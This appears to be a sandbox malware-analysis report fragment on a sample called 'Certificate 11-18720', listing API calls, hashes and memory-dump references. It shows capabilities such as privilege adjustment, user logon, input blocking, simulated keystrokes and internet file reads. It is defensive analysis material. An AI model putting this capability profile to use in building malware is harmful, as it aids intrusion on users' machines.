                                                                                    • Instruction ID: b17f464a66406dcf5b3e83d89dbf0f9a2114694bc724d4206d4313db542e4ffa
                                                                                    • Opcode Fuzzy Hash: 0023dd43f57ffcf3671af2a8d4bca116a65f8cb9d49f77b85a7cdb68d40a1634
                                                                                    • Instruction Fuzzy Hash: C0D0A7749007139FC7315F64EC0D6127AD6BB01300F19841BE885D3250DBB4C880C760
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 005DB22F
                                                                                      • Part of subcall function 005DB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 005DB5A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Proc$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2749884682-0
                                                                                    • Opcode ID: aee593bcdc82a7ba890132323d814b017e4a8b8aad6563ee60689b1113a3a379
                                                                                    • Instruction ID: f6f581a44de07596b9a89f379eb677888261d9089c69dbef6c8bce0c1a0830d1
                                                                                    • Opcode Fuzzy Hash: aee593bcdc82a7ba890132323d814b017e4a8b8aad6563ee60689b1113a3a379
                                                                                    • Instruction Fuzzy Hash: 3CA10565114005FAFB386B6D5C88EBF2D6FFB96350F124A2FF401D6392DB169C0192B2
                                                                                    APIs
                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006143BF,00000000), ref: 00614FA6
                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00614FD2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                    • String ID:
                                                                                    • API String ID: 599397726-0
                                                                                    • Opcode ID: 043b009154773a58e77689e6012badc644104662928849800a2881b3a3be40cc
                                                                                    • Instruction ID: 02904d10645545cf1b8fd74a9ba7b76fe31d4042e1dcddab14fe0e8f00532ddc
                                                                                    • Opcode Fuzzy Hash: 043b009154773a58e77689e6012badc644104662928849800a2881b3a3be40cc
                                                                                    • Instruction Fuzzy Hash: BE41D971504205FFEB209E94DC85EFFB7BEEB80755F14402EF205A7240DA719E829650
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: \Qg
                                                                                    • API String ID: 4104443479-3935409704
                                                                                    • Opcode ID: 3f8306257baa6dd9b0cb37b8aa1fcdb3fb32208e0ffb9bf4c8385e0515b2b00f
                                                                                    • Instruction ID: 414a8853b191cb9876e1e9a82deef11bd69c598dec85f28da92a0b67b9b6a62e
                                                                                    • Opcode Fuzzy Hash: 3f8306257baa6dd9b0cb37b8aa1fcdb3fb32208e0ffb9bf4c8385e0515b2b00f
                                                                                    • Instruction Fuzzy Hash: CAA23C74904219CFDB24CF98C880BADBBB2FF49314F2581A9D859AB791D7349D81DF90
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0060E20D
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0060E267
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0060E2B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1682464887-0
                                                                                    • Opcode ID: 119573dbbf70606c7552d7ca1fd02e470a88dbd8d6081998263aa8292fdf130b
                                                                                    • Instruction ID: 3ebac50b0ba780a3229b1e6e2d55cfd08ef5e4fc291ffbd14ebfe868563e7c93
                                                                                    • Opcode Fuzzy Hash: 119573dbbf70606c7552d7ca1fd02e470a88dbd8d6081998263aa8292fdf130b
                                                                                    • Instruction Fuzzy Hash: 0C216D35A00119EFCB04EFA5D884EAEFBB9FF89310F0484AAE905A7391DB319D05CB50
                                                                                    APIs
                                                                                      • Part of subcall function 005DF4EA: std::exception::exception.LIBCMT ref: 005DF51E
                                                                                      • Part of subcall function 005DF4EA: __CxxThrowException@8.LIBCMT ref: 005DF533
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005FB180
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005FB1AD
                                                                                    • GetLastError.KERNEL32 ref: 005FB1BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1922334811-0
                                                                                    • Opcode ID: d89bfc91298f5353ed40a96a8311a62ec94a03f5dcb28c0d5a78aad2aea99cf1
                                                                                    • Instruction ID: 7dd4ae236e0b6029e021366db11d10cf5961af54b56d139f48ec22add9914bce
                                                                                    • Opcode Fuzzy Hash: d89bfc91298f5353ed40a96a8311a62ec94a03f5dcb28c0d5a78aad2aea99cf1
                                                                                    • Instruction Fuzzy Hash: A2118CB2904305AFE728AF68DC85D2BBBADFB45710B20892EE55697241DB74FC41CB60
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00606623
                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00606664
                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0060666F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 33631002-0
                                                                                    • Opcode ID: 433179924ca7eab14982b834cfeaedf7c907fce76967ede97176eba28086af24
                                                                                    • Instruction ID: d961fa6209a1ddf6d861e8acba13b3dbc04620a70b1bf071a8ecb24b8e7139e0
                                                                                    • Opcode Fuzzy Hash: 433179924ca7eab14982b834cfeaedf7c907fce76967ede97176eba28086af24
                                                                                    • Instruction Fuzzy Hash: DF115EB5E11228BFDB158FA4DC44BAFBBBDEB46B10F104152F900E7290D3B15A058BA1
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00607223
                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0060723A
                                                                                    • FreeSid.ADVAPI32(?), ref: 0060724A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID:
                                                                                    • API String ID: 3429775523-0
                                                                                    • Opcode ID: e704047e241fb21321e2724221de4f290802373cbe862f4c6da6457bead0d969
                                                                                    • Instruction ID: 2cc8468d0bf74384a9df2a9abe2ef20498e5cc3b59f9f03deb4a5324786dd008
                                                                                    • Opcode Fuzzy Hash: e704047e241fb21321e2724221de4f290802373cbe862f4c6da6457bead0d969
                                                                                    • Instruction Fuzzy Hash: C1F01D7AE44209BFDF04DFE4DD89AEEBBB9EF09601F105469A602E3191E2709A448B10
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0060F599
                                                                                    • FindClose.KERNEL32(00000000), ref: 0060F5C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 3228d9be9731184ef2e744a373e47472a28f23e5504ddd1926578e43bacdb14d
                                                                                    • Instruction ID: 9f2d46dc1ebdb2c55b6c5c98ce68f1ecd9a77a3dc4b6f85b51bcd456da2126e8
                                                                                    • Opcode Fuzzy Hash: 3228d9be9731184ef2e744a373e47472a28f23e5504ddd1926578e43bacdb14d
                                                                                    • Instruction Fuzzy Hash: DD1180726106019FD714EF28D849A2EB7EAFF95324F00891EF9A9D7391DB30AD018B85
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0061BE6A,?,?,00000000,?), ref: 0060CEA7
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0061BE6A,?,?,00000000,?), ref: 0060CEB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: a28690a3fadd507e2129ec96f382e806134e66b489b090516c70f7e54dbaac22
                                                                                    • Instruction ID: 54654df5e70b320789620af199872a026e5e3bfc99051a7522b96179cfb9249b
                                                                                    • Opcode Fuzzy Hash: a28690a3fadd507e2129ec96f382e806134e66b489b090516c70f7e54dbaac22
                                                                                    • Instruction Fuzzy Hash: 7FF08235500329BBDB10AFA4DC49FEB7B6EBF49361F004165F919D6191D6709A40CBA0
                                                                                    APIs
                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00604153
                                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00604166
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InputSendkeybd_event
                                                                                    • String ID:
                                                                                    • API String ID: 3536248340-0
                                                                                    • Opcode ID: e6cc760687e793644283394cb2ea5600ce19bbdcddd4e4ab9edea54187159669
                                                                                    • Instruction ID: 6a7ac54a8d8760ce3c1637f4b6cedda46cc33e48822708fd55e74bc0846cb5f0
                                                                                    • Opcode Fuzzy Hash: e6cc760687e793644283394cb2ea5600ce19bbdcddd4e4ab9edea54187159669
                                                                                    • Instruction Fuzzy Hash: 5BF0677490424DAFDB098FA0C805BBE7BB1EF00305F00804AF966A6292DB798612DFA0
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005FACC0), ref: 005FAB99
                                                                                    • CloseHandle.KERNEL32(?,?,005FACC0), ref: 005FABAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: 354105d386247429bd02c6fb5e348d7ec4de24ea1ce46a9de08d3f1bb55378e2
                                                                                    • Instruction ID: 45f7dd7fe83e691855416635d605c5eacd6a6858acc596ddc7e426b64fdd0e2e
                                                                                    • Opcode Fuzzy Hash: 354105d386247429bd02c6fb5e348d7ec4de24ea1ce46a9de08d3f1bb55378e2
                                                                                    • Instruction Fuzzy Hash: 22E0E675000511AFE7362F54FC09D777BEAFF45320710842AF95A81574D7626C90DB50
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,005E6DB3,-0000031A,?,?,00000001), ref: 005E81B1
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005E81BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 23e41638f107b245f877255fc2fb2813ada144569f851e5eab3d794f529cbc04
                                                                                    • Instruction ID: b111e54ac04e15019aa7f6dae0a56154b191079ee4c928b3a976ad37840669d4
                                                                                    • Opcode Fuzzy Hash: 23e41638f107b245f877255fc2fb2813ada144569f851e5eab3d794f529cbc04
                                                                                    • Instruction Fuzzy Hash: 6CB09235544608FBDB022FA1EC09B587FAAEB0BA52F009010F60D840618B7254108AA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 91615eed616f7e8d7d5c6912771070537c6e8ae8c5da7710dd8dc958c3d736c7
                                                                                    • Instruction ID: 9dee2a68befa3b58bfe06b48ed6bc26a1051703d465135643e16e2fab3a044e0
                                                                                    • Opcode Fuzzy Hash: 91615eed616f7e8d7d5c6912771070537c6e8ae8c5da7710dd8dc958c3d736c7
                                                                                    • Instruction Fuzzy Hash: 04325621D28F424DD7279635CC32335AA99BFB73C5F15E737E81AB59A6EB28C4834110
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 674341424-0
                                                                                    • Opcode ID: 47e6571deb7dfcb88d2662118cce97d37446947661c9c708fbcb7bf30bf7471a
                                                                                    • Instruction ID: fb817f2a28a8a42d1bb4c25878bfca13d97775ade17bca6dd5b0c65738b66781
                                                                                    • Opcode Fuzzy Hash: 47e6571deb7dfcb88d2662118cce97d37446947661c9c708fbcb7bf30bf7471a
                                                                                    • Instruction Fuzzy Hash: EB2288715083029FD724DF58C899FABBBE5BF84314F10491EF89A9B291DB71E944CB82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 0060B6DF
                                                                                      • Part of subcall function 005E344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0060BDC3,00000000,?,?,?,?,0060BF70,00000000,?), ref: 005E3453
                                                                                      • Part of subcall function 005E344A: __aulldiv.LIBCMT ref: 005E3473
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID:
                                                                                    • API String ID: 2893107130-0
                                                                                    APIs
                                                                                    • BlockInput.USER32(00000001), ref: 00616ACA
                                                                                    Similarity
                                                                                    • API ID: BlockInput
                                                                                    • String ID:
                                                                                    • API String ID: 3456056419-0
                                                                                    APIs
                                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0060750A
                                                                                    Similarity
                                                                                    • API ID: mouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 2434400541-0
                                                                                    APIs
                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,005FAD3E), ref: 005FB124
                                                                                    Similarity
                                                                                    • API ID: LogonUser
                                                                                    • String ID:
                                                                                    • API String ID: 1244722697-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: NameUser
                                                                                    • String ID:
                                                                                    • API String ID: 2645101109-0
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 005E818F
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3728558374-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                    • Instruction ID: c868c8335abcf60c4906f49dec3e54a7deb420ff4b901e9a176a52fd5f0c928c
                                                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                    • Instruction Fuzzy Hash: 1DC1A2322051E30ADF6D463E843453EBFA1AA917B131A2B6ED4F3CB5D5EE60C564D720
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Memory Dump Source
